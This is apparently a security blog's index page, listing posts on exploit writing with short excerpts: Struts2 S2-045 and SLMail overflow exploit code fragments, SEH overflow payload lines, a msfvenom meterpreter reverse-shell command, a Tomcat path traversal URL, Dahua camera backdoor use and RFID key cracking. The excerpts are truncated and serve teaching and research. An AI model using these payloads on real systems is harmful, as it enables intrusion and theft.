exploit
Nixawk
exploit - win32 - stack winding and unwinding
In order to understand the function stack, we create the demo code. #include <stdio.h> #include <stdlib.h> int function3(int i3){ char *local_var1_f3 = "Function3"; return 3;} int function2(int i2){
Original 2015-06-16 07:56:09 · 696 views · 0 comments
Exploit - mysql unsha1
mysql-unsha1: Authenticate against a MySQL server without knowing the cleartext password. Abstract: This PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with
Original 2017-03-27 11:45:47 · 1351 views · 0 comments
Exploit - RFID
RFID Hacking: Prepare; Install Proxmark3; Check Proxmark3 / card status; Crack Keys; PRNG Attack; NESTED Attack; Dump data & Write data. Prepare. Install Proxmark3. $ sudo apt-get install git build-essential libread
Original 2017-04-01 13:24:32 · 2078 views · 0 comments
exploit - dahua camera backdoor
Just for security assessment. If you can exploit the Dahua camera devices, username/password/cookies can be used to access camera video. Exploit Code: I’ll share it later. $ python exploit_dahua.py 192.168
Original 2017-03-17 17:13:15 · 11112 views · 0 comments
exploit - CVE-2017-5638 - Apache Struts2 S2-045
Metasploit-Framework. Exp Code: #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlCo
Original 2017-03-07 17:13:45 · 5677 views · 1 comment
exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
https://www.exploit-db.com/exploits/638/ #!/usr/bin/python # -*- encoding: utf-8 -*- import sys import socket import struct ## OS Name: Microsoft Windows XP Professional # OS Version:
Original 2016-07-26 22:30:52 · 3270 views · 0 comments
exploit - ClamAV servers vulnerable to unauthenticated clamav command execution.
ClamAV® is an open source antivirus engine for detecting trojans, viruses, malware & other malicious threats. Setup Clamav Environment: $ sudo apt-get install clamav clamav-daemon $ sudo freshclam $ sudo
Original 2016-06-14 10:51:14 · 959 views · 0 comments
Exploit writing tutorial part1: Stack Based Overflows
Author: Corelan Team (corelanc0d3r). Modified by: Nixawk. This tutorial will show you how to exploit software through a stack overflow. Requirements: Software: Easy RM to MP3 Converter Version 2.7.3.700.2006.09
Repost 2015-06-28 14:30:46 · 2337 views · 0 comments
windbg - Byakugan
1. Install Byakugan. lab:bin/ $ pwd /home/someone/metasploit-framework/external/source/byakugan/bin lab:bin/ $ tree . ├── Vista │ ├── byakugan.dll │ ├── detoured.dll │ └── injectsu.dll ├── Win7 │
Original 2015-06-22 23:12:08 · 1569 views · 0 comments
exploit - Immunity Debugger - PyCommands List
PyCommand | Description: acrocache | Dumps Acrobat Reader Cache state
Original 2015-06-23 20:57:27 · 909 views · 0 comments
windbg - command manual
Help commands: 0:000> !help diskspace <DriveLetter>[:] - Displays free disk space for specified volume; address [address] - Displays the address space la
Original 2015-06-24 13:58:38 · 1365 views · 0 comments
exploit - write metasploit exploit script
Create Vuln Server: Compile the source code with VC6.0 / Dev C++. #include <iostream.h> #include <stdio.h> #include <winsock.h> #include <windows.h> //load windows socket #pragma comment(lib, "wsock32.lib
Original 2015-06-22 19:23:33 · 1686 views · 1 comment
exploit - mona.py - the manual
mona.py. Install mona.py: Put mona.py into C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands. Basic usage: Open Immunity Debugger. At the bottom of the application you should see an input box (comm
Original 2015-02-27 14:07:31 · 3654 views · 0 comments
exploit - stack overflow with seh
Demo Prog: Exploit Code: #!/usr/bin/env python # -*- coding: utf8 -*- # Author: Nixawk fpath = "C:\Program Files\SoriTong\Skin\Default\UI.txt" with open(fpath, "w") as f: junk = "A" * 584 nseh = "\xE
Original 2015-06-22 16:40:13 · 889 views · 0 comments
exploit - windbg - find "jmp esp"
Demo Program: Easy RM to MP3 Converter. Demo Platform: Windows XP SP3. Exploit StackOverflow. Final exploit code as follows: #!/usr/bin/env python # -*- coding: utf8 -*- with open("windbg_crash.m3u", "w") as
Original 2015-06-20 22:07:19 · 2274 views · 0 comments
exploit - simple stack overflow - BlazeDVD Pro player 6.1
PoC: BlazeDVD Pro player 6.1 local stack-based buffer overflow. PuN1sh3r shows us how to exploit BlazeDVD Pro player 6.1 on Windows 2003 Server SP1 (EN). Now, I’ll show you a PoC on Windows XP SP3. #!/usr/b
Original 2015-06-19 21:25:16 · 847 views · 0 comments
msfvenom / ndisasm - disass shellcode
root:~ /# msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 -a x86 -f raw --platform win | ndisasm -u - Found 0 compatible encoders 00000000 FC cld 00000001 E886000000
Original 2015-06-18 00:17:29 · 1285 views · 0 comments
Exploit - Apache Tomcat Directory/Path Traversal
http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users Previous URL would copy file na
Repost 2017-04-06 18:20:06 · 2338 views · 0 comments